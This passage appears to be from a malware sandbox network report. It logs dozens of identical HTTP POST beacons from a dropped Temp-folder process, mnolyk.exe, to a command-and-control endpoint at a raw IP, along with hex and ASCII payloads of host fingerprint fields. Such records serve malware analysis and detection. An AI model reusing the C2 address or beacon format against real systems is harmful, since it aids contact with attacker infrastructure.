                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.097645998 CET | 733 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      619 | 192.168.2.7 | 50314 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:48.299453974 CET | 734 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.361939907 CET | 734 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      62 | 192.168.2.7 | 49757 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:16.570116043 CET | 177 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.632927895 CET | 177 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      620 | 192.168.2.7 | 50315 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:48.543329954 CET | 735 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.608316898 CET | 735 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      621 | 192.168.2.7 | 50316 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:48.784877062 CET | 736 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.847752094 CET | 736 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      622 | 192.168.2.7 | 50317 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:49.028783083 CET | 737 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.092154026 CET | 737 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      623 | 192.168.2.7 | 50318 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:49.262876034 CET | 738 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.325089931 CET | 738 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      624 | 192.168.2.7 | 50319 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:49.495651960 CET | 739 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.557312012 CET | 739 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      625 | 192.168.2.7 | 50320 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:49.746311903 CET | 740 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.811568022 CET | 740 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      626 | 192.168.2.7 | 50321 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:50.021531105 CET | 741 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.086796999 CET | 741 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      627 | 192.168.2.7 | 50322 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:50.288219929 CET | 742 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.352765083 CET | 742 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      628 | 192.168.2.7 | 50323 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:50.536075115 CET | 743 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.598954916 CET | 743 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      629 | 192.168.2.7 | 50324 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:50.786571026 CET | 744 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.849370003 CET | 744 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      63 | 192.168.2.7 | 49758 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:16.813664913 CET | 178 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.878535032 CET | 178 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      630 | 192.168.2.7 | 50325 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:51.040293932 CET | 745 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.107878923 CET | 745 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      631 | 192.168.2.7 | 50326 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:51.276591063 CET | 746 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.341442108 CET | 746 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      632 | 192.168.2.7 | 50327 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:51.514148951 CET | 747 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.579749107 CET | 747 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      633 | 192.168.2.7 | 50328 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:51.766212940 CET | 748 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.831080914 CET | 748 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      634 | 192.168.2.7 | 50329 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:52.020232916 CET | 749 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.084115028 CET | 749 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      635 | 192.168.2.7 | 50330 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:52.266544104 CET | 750 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.330137968 CET | 750 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
